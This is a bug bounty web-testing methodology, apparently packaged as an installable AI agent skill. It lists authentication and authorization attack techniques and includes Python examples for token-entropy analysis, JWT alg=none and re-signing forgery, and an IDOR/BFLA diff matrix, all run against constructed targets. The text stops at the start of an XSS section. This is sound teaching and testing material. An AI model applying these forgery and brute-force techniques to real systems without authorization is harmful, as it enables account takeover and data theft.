bounty-weblisted
Install: claude install-skill 26zl/cybersec-toolkit
# Bug bounty web testing methodology
Build on top of `bounty-recon` results. Tool-first: use SecLists wordlists (already cloned in this installer) before writing custom payloads.
## 1. Authentication & session
| Test | How |
| --- | --- |
| Default creds | `hydra`, manual common pairs (admin:admin, root:root) |
| User enumeration | compare error text, response length and timing for valid vs. invalid usernames on the login, signup and reset forms |
| Account takeover via password reset | inspect token entropy, host header injection on reset email |
| Session fixation | note the pre-login session ID, log in, confirm the server issued a new one; if the old ID still works the session can be fixed |
| Session predictability | collect 50+ tokens in issue order, check per-byte entropy and look for counters or timestamps (Burp Sequencer) |
| MFA bypass | response manipulation (401→200), brute the OTP, race the verify endpoint |
| Login CSRF | missing CSRF token on /login (attacker logs the victim into an attacker-controlled account) |
| Logout / impersonation flaws | replay the cookie after logout (server-side invalidation missing), swap cookies between two accounts |
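The "session predictability" row is the one that benefits from a script rather than eyeballing. The example below is added here and is not part of the toolkit: it takes tokens in issue order, computes per-byte Shannon entropy (a byte position that barely varies is dead key space) and checks whether the tokens behave like a counter. Both token sets are constructed, not captured from any target; the thresholds (`weak_ratio`, `counter_spread`) are assumptions you should tune.

```python
"""Quick predictability check on a sample of session tokens (hex-encoded).

Feed tokens in the order the server issued them; 50+ is a sensible minimum.
Two signals: per-byte Shannon entropy (a fixed or low-entropy byte means the
real key space is far smaller than the token length suggests) and a counter
check on successive numeric deltas (an incrementing ID behind a fixed prefix
is guessable outright).
"""
import math
import random
from collections import Counter


def shannon_entropy_bits(values):
    """Shannon entropy in bits of the empirical distribution of `values`."""
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in Counter(values).values())


def analyze_tokens(hex_tokens, weak_ratio=0.5, counter_spread=16):
    """Return per-byte entropy, the byte positions that look weak, and
    whether successive tokens look like a counter."""
    if len({len(t) for t in hex_tokens}) != 1:
        raise ValueError("all tokens must have the same length")
    raw = [bytes.fromhex(t) for t in hex_tokens]
    n_bytes = len(raw[0])
    per_byte = [shannon_entropy_bits([r[i] for r in raw]) for i in range(n_bytes)]
    # With N samples a byte can show at most log2(N) bits, capped at 8.
    ceiling = min(8.0, math.log2(len(raw)))
    weak_positions = [i for i, e in enumerate(per_byte) if e < ceiling * weak_ratio]
    as_ints = [int(t, 16) for t in hex_tokens]
    deltas = [b - a for a, b in zip(as_ints, as_ints[1:])]
    # A counter (fixed or nearly fixed step) gives deltas that all sit inside
    # a narrow positive band; random tokens do not.
    counter_like = all(d > 0 for d in deltas) and (max(deltas) - min(deltas)) < counter_spread
    return {
        "per_byte_entropy": per_byte,
        "weak_positions": weak_positions,
        "counter_like": counter_like,
        "observed_bits": sum(per_byte),
    }


# Constructed samples (not from any real target):
# a fixed 4-byte prefix followed by a counter stepping by 3 ...
WEAK_TOKENS = ["deadbeef" + f"{1000 + 3 * i:08x}" for i in range(64)]
# ... and 64 seeded pseudo-random 8-byte tokens standing in for a sound design.
_rng = random.Random(1234)
STRONG_TOKENS = [f"{_rng.getrandbits(64):016x}" for _ in range(64)]

if __name__ == "__main__":
    for name, toks in (("weak", WEAK_TOKENS), ("strong", STRONG_TOKENS)):
        r = analyze_tokens(toks)
        print(f"{name:6} weak byte positions={r['weak_positions']} "
              f"counter_like={r['counter_like']} observed_bits={r['observed_bits']:.1f}")
```

For the weak set only the last byte carries real entropy and the deltas are all 3, so the token is a prefix plus a counter; report it as predictable even before attempting to guess a live one.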
## 2. Authorization (highest-paying class)
- **IDOR:** swap numeric IDs, UUIDs, encoded IDs. Try both directions: A→B and B→A.
- **BFLA:** swap roles. Test admin endpoints as a regular user.
- **BOLA (API):** access another user's resource by ID.
- **Path traversal in route params:** `/users/../admin/users`.
- **JWT claims:** change `role: user` → `role: admin`, then either re-sign with a weak or leaked HMAC secret or set `alg: none` with an empty signature; check whether the server pins the algorithm or trusts the header.
- **Race conditions on permission grants:** use `turbo-intruder` or parallel curl.
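The JWT item above is easiest to see with the two verifier shapes side by side. The block below is an added example, not code from the toolkit: stdlib only, it issues a legitimate HS256 token, forges an `alg=none` variant and a re-signed variant, and runs each through a verifier that honours the header's `alg` (vulnerable) and one that pins the algorithm server-side (fixed). `SECRET` and the claims are constructed; the secret is deliberately weak to model the "re-sign" case.

```python
"""JWT claim tampering (alg=none and re-signing) against a vulnerable and a
pinned verifier. No PyJWT needed; SECRET and claims are constructed."""
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode(obj) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a token the way a legitimate server would."""
    signing_input = _encode({"alg": "HS256", "typ": "JWT"}) + "." + _encode(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def forge_alg_none(token: str, **new_claims) -> str:
    """Attacker: rewrite claims, declare alg=none, drop the signature."""
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    payload = json.loads(b64url_decode(p))
    header["alg"] = "none"
    payload.update(new_claims)
    return _encode(header) + "." + _encode(payload) + "."


def forge_resigned(token: str, secret: bytes, **new_claims) -> str:
    """Attacker who recovered the HMAC secret: rewrite claims and re-sign."""
    _, p, _ = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload.update(new_claims)
    return sign_hs256(payload, secret)


def verify_vulnerable(token: str, secret: bytes) -> dict:
    """BUG: trusts the alg from the attacker-controlled header."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))          # unsigned token accepted
    if header.get("alg") == "HS256":
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    raise ValueError("bad signature")


def verify_pinned(token: str, secret: bytes) -> dict:
    """Fixed: the algorithm is a server-side constant; the header must match it."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


SECRET = b"s3cret"   # constructed; deliberately weak to model a crackable secret
LEGIT = sign_hs256({"sub": "1337", "role": "user"}, SECRET)


def role_seen_by(verifier, token: str):
    """Role the verifier would grant, or None if it rejects the token."""
    try:
        return verifier(token, SECRET)["role"]
    except ValueError:
        return None


if __name__ == "__main__":
    none_tok = forge_alg_none(LEGIT, role="admin")
    resigned = forge_resigned(LEGIT, SECRET, role="admin")
    for name, tok in (("legit", LEGIT), ("alg=none", none_tok), ("re-signed", resigned)):
        print(f"{name:10} vulnerable={role_seen_by(verify_vulnerable, tok)} "
              f"pinned={role_seen_by(verify_pinned, tok)}")
```

The re-signed token passes even the pinned verifier, which is the point of the "re-sign" branch: algorithm pinning does nothing against a guessable secret, so run the captured token through a wordlist attack as well.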
Methodology: enumerate every endpoint as a low-privilege user, then re-request each with no auth, an expired token, and another user's token. Diff status, length and body against the low-privilege baseline.
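The replay-and-diff loop above as a script, added here as an example and not part of the toolkit. `mock_send` is a constructed target with one IDOR (profile route has no ownership check) and one BFLA (admin route checks only that a token is valid) so the script runs offline; against a real target replace it with a function that sends the request (for instance via `requests.Session`) and returns `(status, parsed_body)`. Token names, paths and the `ENDPOINTS` list are assumptions.

```python
"""Authorization diff matrix: replay every endpoint the low-privilege user can
reach with no token, an expired token and another user's token, then compare
status and body with the low-privilege baseline."""
import re

# --- constructed target (not a real API) -----------------------------------
USERS = {"tok-alice": 1, "tok-bob": 2}            # token -> user id
PROFILES = {1: {"id": 1, "email": "alice@example.test"},
            2: {"id": 2, "email": "bob@example.test"}}
INVOICES = {1: ["INV-100"], 2: ["INV-200"]}


def mock_send(method, path, token):
    """Return (status, body). Two deliberate flaws: the profile route has no
    ownership check (IDOR) and the admin route checks only that the token is
    valid, never the role (BFLA)."""
    if token is None:
        return 401, {"error": "auth required"}
    user = USERS.get(token)
    if user is None:
        return 401, {"error": "invalid or expired token"}
    m = re.fullmatch(r"/api/users/(\d+)/profile", path)
    if m and method == "GET":
        return 200, PROFILES.get(int(m.group(1)), {})       # IDOR: any user's profile
    m = re.fullmatch(r"/api/users/(\d+)/invoices", path)
    if m and method == "GET":
        if int(m.group(1)) != user:
            return 403, {"error": "forbidden"}               # correct ownership check
        return 200, {"invoices": INVOICES[user]}
    if path == "/api/admin/users" and method == "GET":
        return 200, {"users": sorted(PROFILES)}             # BFLA: no role check
    return 404, {"error": "not found"}


# --- the methodology -------------------------------------------------------
def authz_matrix(endpoints, baseline_token, variants, send):
    """Request each endpoint as the low-privilege user, then with every
    variant credential. Record status and whether the body is identical."""
    matrix = {}
    for method, path in endpoints:
        base_status, base_body = send(method, path, baseline_token)
        row = {"baseline": base_status, "variants": {}}
        for name, tok in variants.items():
            status, body = send(method, path, tok)
            row["variants"][name] = {"status": status, "same_body": body == base_body}
        matrix[(method, path)] = row
    return matrix


def findings(matrix, admin_paths=frozenset()):
    """Turn the matrix into (path, note) pairs. Only endpoints the baseline
    user could actually use (200) are considered."""
    notes = []
    for (_method, path), row in matrix.items():
        if row["baseline"] != 200:
            continue
        if path in admin_paths:
            notes.append((path, "BFLA: admin endpoint served to a low-privilege user"))
            continue
        for name, v in row["variants"].items():
            if v["status"] == 200 and v["same_body"]:
                if name == "other_user":
                    notes.append((path, "IDOR/BOLA: other user's token gets an identical response"))
                else:
                    notes.append((path, f"{name}: credential accepted, identical response"))
    return notes


# Endpoints gathered while browsing as alice (the low-privilege baseline).
ENDPOINTS = [("GET", "/api/users/1/profile"),
             ("GET", "/api/users/1/invoices"),
             ("GET", "/api/admin/users")]
VARIANTS = {"no_auth": None, "expired": "tok-expired", "other_user": "tok-bob"}
ADMIN_PATHS = frozenset({"/api/admin/users"})

if __name__ == "__main__":
    matrix = authz_matrix(ENDPOINTS, "tok-alice", VARIANTS, mock_send)
    for path, note in findings(matrix, ADMIN_PATHS):
        print(f"{path}: {note}")
```

The `same_body` comparison is what separates a real IDOR from a benign 200: an endpoint like `/api/me` returns 200 for every valid token but with a different body, and is not flagged. Run the matrix a second time with bob as baseline and alice as `other_user` to cover the B→A direction.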
## 3. Input handling
### XSS
```bash
# DOM/reflect